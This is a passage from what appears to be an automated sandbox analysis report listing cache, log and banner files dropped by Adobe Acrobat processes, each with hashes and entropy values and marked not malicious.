SHA-512: | 4F347793C1D8CA666510EAC238250B28705836832A90EA21DA9104E2BF4E3EF424A5074F01D761D53349044466AA330A9D1D9425EA2FDF20CD37ADB59857C82A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.141096181791235 |
Encrypted: | false |
SSDEEP: | 6:iO4qV+6Vq2Pwkn2nKuAl9OmbnIFUtSqV5gZmwsqV5IkwOwkn2nKuAl9OmbjLJ:7n+6VvYfHAahFUtZ5g/L5I5JfHAaSJ |
MD5: | 7ACEC6081C08180FFBC7CFF7CE9D39CC |
SHA1: | 3FB7BBCDE864C81D2A02FC8F2B2F3E526F51103A |
SHA-256: | F2FABB0FC072A9F8E6D945A4E706BC9AFEC081E70B5184F1BDCED93253E3875F |
SHA-512: | DB6C59BF39A9996C286572E29DCD093145A01A1194E0AF195AA4D515EC79D1D722BE7EB89D501ACFA5EE962958F1BE31658897317EF8D178F917FB236D2780F8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.141096181791235 |
Encrypted: | false |
SSDEEP: | 6:iO4qV+6Vq2Pwkn2nKuAl9OmbnIFUtSqV5gZmwsqV5IkwOwkn2nKuAl9OmbjLJ:7n+6VvYfHAahFUtZ5g/L5I5JfHAaSJ |
MD5: | 7ACEC6081C08180FFBC7CFF7CE9D39CC |
SHA1: | 3FB7BBCDE864C81D2A02FC8F2B2F3E526F51103A |
SHA-256: | F2FABB0FC072A9F8E6D945A4E706BC9AFEC081E70B5184F1BDCED93253E3875F |
SHA-512: | DB6C59BF39A9996C286572E29DCD093145A01A1194E0AF195AA4D515EC79D1D722BE7EB89D501ACFA5EE962958F1BE31658897317EF8D178F917FB236D2780F8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.185346732796338 |
Encrypted: | false |
SSDEEP: | 6:iO4qVa+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqVqjZZmwsqVdVkwOwkn2nKuAl9OmbX:7n7vYfHAa8uFUtZ2Z/Lj5JfHAa8RJ |
MD5: | B907B4B4C1A85D05EFD42AD0E93B0525 |
SHA1: | D609FE9E1884B2A0596FFA21ED48FD0C8EE99C5F |
SHA-256: | 2CC05469B7D1BFA93EAE4C80781DDB8B3C6ED8FF686742C860138CEB01803897 |
SHA-512: | 97872F3481C2E5D577EFEBE09CFCF1F33F0AA21D230C8E9B6B03293853B8CD9A29A9B2EFB1840096FB2D6E412231B4B17F81199F8D101CB277290499FE13CDD6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 336 |
Entropy (8bit): | 5.185346732796338 |
Encrypted: | false |
SSDEEP: | 6:iO4qVa+q2Pwkn2nKuAl9Ombzo2jMGIFUtSqVqjZZmwsqVdVkwOwkn2nKuAl9OmbX:7n7vYfHAa8uFUtZ2Z/Lj5JfHAa8RJ |
MD5: | B907B4B4C1A85D05EFD42AD0E93B0525 |
SHA1: | D609FE9E1884B2A0596FFA21ED48FD0C8EE99C5F |
SHA-256: | 2CC05469B7D1BFA93EAE4C80781DDB8B3C6ED8FF686742C860138CEB01803897 |
SHA-512: | 97872F3481C2E5D577EFEBE09CFCF1F33F0AA21D230C8E9B6B03293853B8CD9A29A9B2EFB1840096FB2D6E412231B4B17F81199F8D101CB277290499FE13CDD6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\52ebbd06-29e7-4900-8ecf-7569078b1d55.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.959804614782029 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqEsBdOg2Hgcaq3QYiubInP7E4T3y:Y2sRdsodMHL3QYhbG7nby |
MD5: | 80AE6C79062012B8BC3129E6BF1996D1 |
SHA1: | B36F08DD365342CF2F82F111B3F775D82AFE39D0 |
SHA-256: | 3EAED4C98D32F96F29271276C134F43EBDC3EF6273706DC2B89399314B9BBA2E |
SHA-512: | BCF02761FB639F801A38B36ACEB00E5677348E65A9E12D19EC830D2206F6B59898CC5AF8EC48BD0C28D7275F3C4E314BED30B147B73E89EFD3FD72FAFBB9DBFB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.959804614782029 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqEsBdOg2Hgcaq3QYiubInP7E4T3y:Y2sRdsodMHL3QYhbG7nby |
MD5: | 80AE6C79062012B8BC3129E6BF1996D1 |
SHA1: | B36F08DD365342CF2F82F111B3F775D82AFE39D0 |
SHA-256: | 3EAED4C98D32F96F29271276C134F43EBDC3EF6273706DC2B89399314B9BBA2E |
SHA-512: | BCF02761FB639F801A38B36ACEB00E5677348E65A9E12D19EC830D2206F6B59898CC5AF8EC48BD0C28D7275F3C4E314BED30B147B73E89EFD3FD72FAFBB9DBFB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4320 |
Entropy (8bit): | 5.256656870453207 |
Encrypted: | false |
SSDEEP: | 96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo76Oa:etJCV4FiN/jTN/2r8Mta02fEhgO73goE |
MD5: | 58BF720253C49BD65CFC4B967D6B3DCA |
SHA1: | B08FE7DE358408C7DDE2E3BBC9DADA1A0E51F855 |
SHA-256: | DBF5F6968EAD35CEED3D6ACC427C70B1A8D7D67CEDDA2CEF48246F327FFA15B1 |
SHA-512: | DBA8A4736A7768808F033E540D39E261B809AFD40031499124A3055DBD3457312E913F5416BE467E959F4A6CD08A2F3820939C57BF61158888361F53C9197BE0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1124417336439985 |
Encrypted: | false |
SSDEEP: | 6:iO4qVA0Ui+q2Pwkn2nKuAl9OmbzNMxIFUtSqVA+ZZmwsqVAaiVkwOwkn2nKuAl9c:7nZevYfHAa8jFUtZxZ/Lk5JfHAa84J |
MD5: | DA2D21D94DF41D9D47AF3932EA7E153B |
SHA1: | 963B79792EBA2F2A06E194234E6E18904AADEEE6 |
SHA-256: | 7D2DED728C7A413A9DFA68BA547895351AB74A5B71DE31B23243B513D8E28B56 |
SHA-512: | 58BB62513B2AAD724EE909BE345B6CD4890003F3975FB8E881617FD57D44E183D6A3DD15EA50778EA54B0C597A5945FEDA2AB120039FCD0A356FBC148588338E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 324 |
Entropy (8bit): | 5.1124417336439985 |
Encrypted: | false |
SSDEEP: | 6:iO4qVA0Ui+q2Pwkn2nKuAl9OmbzNMxIFUtSqVA+ZZmwsqVAaiVkwOwkn2nKuAl9c:7nZevYfHAa8jFUtZxZ/Lk5JfHAa84J |
MD5: | DA2D21D94DF41D9D47AF3932EA7E153B |
SHA1: | 963B79792EBA2F2A06E194234E6E18904AADEEE6 |
SHA-256: | 7D2DED728C7A413A9DFA68BA547895351AB74A5B71DE31B23243B513D8E28B56 |
SHA-512: | 58BB62513B2AAD724EE909BE345B6CD4890003F3975FB8E881617FD57D44E183D6A3DD15EA50778EA54B0C597A5945FEDA2AB120039FCD0A356FBC148588338E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444654381475819 |
Encrypted: | false |
SSDEEP: | 384:Sedci5tOiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:5hs3OazzU89UTTgUL |
MD5: | DCA9560D030BD17B19373E218493444D |
SHA1: | 0C73185E2A1ED3A83D66D5B541FD41ACCA082008 |
SHA-256: | F906C85C8C3AA5D9DF85C4F5E5AAD6BCFDFE26514A80D98010D72994E888EDE4 |
SHA-512: | FC6CB1C96F0873B7445C7D1E79C0A47A5CEE8E9963616C458773446C046C469DF35DF8FF87724AA145BCA971380CDC52A37EF406EB35293B9D086F4B788E1DA0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2119423208673745 |
Encrypted: | false |
SSDEEP: | 24:7+tHFXnuwKCqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf92:7MxnCCqvmFTIF3XmHjBoGGR+jMz+Lh8 |
MD5: | 9091A09106EBA919BA470DA69E14F4B3 |
SHA1: | C73C569FBA1911057B166D50B942C88A552B31F4 |
SHA-256: | 8403955816DC8A2C6E231B9DFF8A9D4CE778701B2A4EC44C17CA6A2E6A6FBC9D |
SHA-512: | 7F4553453E7B93290DCD9E2F60AA3A1579CDA224DB7DC9B01CA7144D3C277F1C82C6ADE42D02DC07B1DB632D94FB04042CDB67C90A562053AB3D37F4490CBC31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7425532007658724 |
Encrypted: | false |
SSDEEP: | 3:kkFkl4Iv/l/tfllXlE/HT8kj6/hlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKhk/teT8qKzdNMa8RdWBwRd |
MD5: | B574FAF149997CD545AA3E92283F2389 |
SHA1: | 490AA3C6F9D1F51AA9508FDA256E683DB4E92CB3 |
SHA-256: | 543BAD9785EC44CD276A10EC14BF780D295F55A2C0323E7A826F229793995C3F |
SHA-512: | 34363D5C9D38A499954B55BA87D82EE53A7953A377309967380C9F032CB85A15FA947C5E81C74B947385456B6DB9C1B06D90BE6BF01237626CFCEBF968B7505C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.389559019608683 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJM3g98kUwPeUkwRe9:YvXKX2yzDLbIZc0vjDsGMbLUkee9 |
MD5: | 265C4F88736EF726D925BFF7D6ECBF6B |
SHA1: | 8D9898C277B397CB04279F56395DF253BA03D515 |
SHA-256: | B1FE5FE5E90CCDE9E2B4FBD013D294FC6D831C7ED5A6376B442B97A78BA4E40A |
SHA-512: | 9C5D60B98706152092F4B0FF2F81E2136B577267F3B38B45A9B4090B12E529D79AF10691424C943CDEC641D0A27703F91B4682CE3AC133FA5745AAFEA35B871F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.341955444204877 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfBoTfXpnrPeUkwRe9:YvXKX2yzDLbIZc0vjDsGWTfXcUkee9 |
MD5: | FF99023493FA424739E88D30A91222EB |
SHA1: | D58DA0F56D9D04C000DBD3C229DC88A0F7EB8CEF |
SHA-256: | 9495C8FE6851060251A78EE0FE297A219AF883C896B464CC8A248A834F2330C2 |
SHA-512: | 0CE7E1242ED119C12AABB9A1A27F05D4F384B21C10690A219089221073D5FAB43DA7BDD71188FE9332262C2B9AD2831F9A1F27114017090D378B6DA07EE325BE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.321153192174082 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfBD2G6UpnrPeUkwRe9:YvXKX2yzDLbIZc0vjDsGR22cUkee9 |
MD5: | 941440A793BCAF31AD090EBB127D40F8 |
SHA1: | BB78EAE84C6C03460C92ACE9D26DCA6D237DC969 |
SHA-256: | 148088799D118AB0FD4F15E85BA6C8EAABBBD6AA4B42DD8C41BC57E386B79D2C |
SHA-512: | 5B1F961C4E0E3A759B269DC2349D8E3F4CEC5409768F93D3E5E446012B171CCC60637A8BC8E1C5335C331FE525FA595CFFCC833D950890FEF5411661F2D0FB9B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.377488670831614 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfPmwrPeUkwRe9:YvXKX2yzDLbIZc0vjDsGH56Ukee9 |
MD5: | 4BB22F602810767512898A11BFE57326 |
SHA1: | B5333912BC1F83E0E61313174591452D536C99FA |
SHA-256: | D9A779083ADAB4FF7947BBAFF27585284107D546A297EE71DC6BB1E099A72AF5 |
SHA-512: | 3CAA64E9DA185C9B0CB5A413C3C4D15332DE3AC55FDC6FDF2A1825AD3FE1F61765B062273026305B0A2022E2FD4CFF91C5C0E97A0F4BEE3B59C2629DD1BE95CB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.694251733808258 |
Encrypted: | false |
SSDEEP: | 24:Yv6XNXIzvjDJpLgE9cQx8LennAvzBvkn0RCmK8czOCCSX:YvQXQbDJhgy6SAFv5Ah8cv/X |
MD5: | E976A68A2D68B410AD09C1139D88FC8B |
SHA1: | C0EBA910F166AC32746866E9634552D6F93C41A9 |
SHA-256: | FE6249F6AC0A355199499EB27162426F68FB5208401A36C33B68D05367D3A67C |
SHA-512: | 495B01A62FB71A2B42E61E011BB4930FB4E44B181B5F08C92B9FB91CBA8D0C7DA473AF46D166A87B3C64971180C462F6D61798F0EAFF1883B02F2A5669CDB4F1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.325563991921576 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJf8dPeUkwRe9:YvXKX2yzDLbIZc0vjDsGU8Ukee9 |
MD5: | 7CB1D378120D1E6C0BE2050A818E952E |
SHA1: | 17AE9CB35AB8D8EA6A4D96DB82E0FDDA19DB5659 |
SHA-256: | 0FA6F5F98D651821E4F78EA8451E6CE6DA3DD69E81E47CCA8978FC7B8FCF8E30 |
SHA-512: | 99E2B960765DF3C1B16123370E73891DDA6A51AF40D8905C17BEDED56FCB7FB0D6DB54B7DE5327A55070DCCD6C13F41F8B66296629181AD88C37BE22BBBE456D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.329183785807219 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfQ1rPeUkwRe9:YvXKX2yzDLbIZc0vjDsGY16Ukee9 |
MD5: | 3B4BB9EC9C23142590352066B2B64067 |
SHA1: | 836D21BE2A2D32896BFBE749C460B38A93FF6D85 |
SHA-256: | F0B54C5553656183A1CB33C9ADD35DB1746CB5F6116FD97D8800783E0E241CED |
SHA-512: | 2830AAE6CFF859B8CA4E49BF20D5D6068C61DD53FB38B1D7C110E147124782B032CF74565CBA86D579775E7291BFFE9B48827EC275A2735D4AA2453CCA838E56 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.33381122185042 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfFldPeUkwRe9:YvXKX2yzDLbIZc0vjDsGz8Ukee9 |
MD5: | 430EF5C12CAFA9FBA615D60B9E460E59 |
SHA1: | 80FCB2766F7A4C330E04950685483440EBA98876 |
SHA-256: | 52606B87916240E7AC86FEC684DC8FC1801FB5C1EB607D879157C3477ED11242 |
SHA-512: | B3501F156F88C45B588F900BACF8E49F7D0C49B4C6B96B069E4DA453334EB153EC2B8C69985ACF5A001FCD89975F72A524682813D6E3A77BB0544119F29A898C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.35010449323913 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfzdPeUkwRe9:YvXKX2yzDLbIZc0vjDsGb8Ukee9 |
MD5: | 3798B0DFE18C44688CBBC78114B85859 |
SHA1: | 4D1FD1AAC31B0A94C3179CC5CFAFB2E2E8131637 |
SHA-256: | 68F9FD9751B910034F67DA86F38FE7CD3D020A638FD5C2C1AC58153CDFB5FDA2 |
SHA-512: | 5B506DA3D1F612683DBE93526EB1ED340016381E2DA11AC4AAED6AAB977C8E51B04D341F33857919B88E429F7189975AD4792A40AF133D67E52B327BA1767BF6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.331092636741101 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfYdPeUkwRe9:YvXKX2yzDLbIZc0vjDsGg8Ukee9 |
MD5: | 7C37531D55D4054B422D5BCD83FF366B |
SHA1: | 1E0EC98C787A877C753F74A72524AEA7FD30990F |
SHA-256: | 480E48573A5A1A9B2E652915508C96258EC414EDF6DC876A02FC03B8A92D0EC6 |
SHA-512: | 0C163DD16CBD5BE8CAD13D0B06536E588CFEA434EA4FA8B59A9AD9E12EFA283E036438BEEE7F80A77E0F3A4022A2030B4748354C5D1C1F96F295F5E63BAEAA73 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.317690415140401 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJf+dPeUkwRe9:YvXKX2yzDLbIZc0vjDsG28Ukee9 |
MD5: | 45156FE8AC37115E7585AFE292EC8AEB |
SHA1: | 0CE275C59F2A491DFF7BDFCF5ED9DDE25CF3F840 |
SHA-256: | CE20A21D3C21AD97AB194DE185A16B01349A829A8AAA7B577D880B08DAC9523C |
SHA-512: | 71099A85CD5B3DF117A344D9B990C5000211E54BB5A8F6846603B0144E1EB037B917698E1A9C768F70B7510EDDAE5AA5BF60D1323CB796F0E5E6EE2B7C2B14A8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.314426039317087 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJfbPtdPeUkwRe9:YvXKX2yzDLbIZc0vjDsGDV8Ukee9 |
MD5: | 7CE8C666D34930E6DB091179263F7071 |
SHA1: | DA4234FAFFBC6C993B610C082CF7EAC151197F2C |
SHA-256: | 1CB7FD7EC03AF5C83497A2B768B340B6F7C04460436747C105BD0A71B2102F7A |
SHA-512: | F153EF975AD0FE6926B7EF185F3DC3050CA850A3E32BDDB3B0672FE7CCD342F7B5301EFD331DF12C16D788647C514A5CB8ACF43EC6CC5B394C696FE912186F15 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.319193479866863 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX2yRBGULVlZVoZcg1vRcR0Yic8DoAvJf21rPeUkwRe9:YvXKX2yzDLbIZc0vjDsG+16Ukee9 |
MD5: | 842E09415903A7C22001ABEBB58F250E |
SHA1: | 0F7E4608855AD20BFC369E71AE0A50DF8FD7CBF4 |
SHA-256: | A23A4F8C508DD9A9A84374471AF70F20773480F2510FC60F3F5E59D5AA7CBCAB |
SHA-512: | 4DD1B9A9C226AE1B67D4937FD09BDDBBFF3C45D0B0E10B1F5BBC78FD441C6307C77FD1D7C6E7008D6E4B348232AC85645E592D73DF21E50BF9B093CC8F69575F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
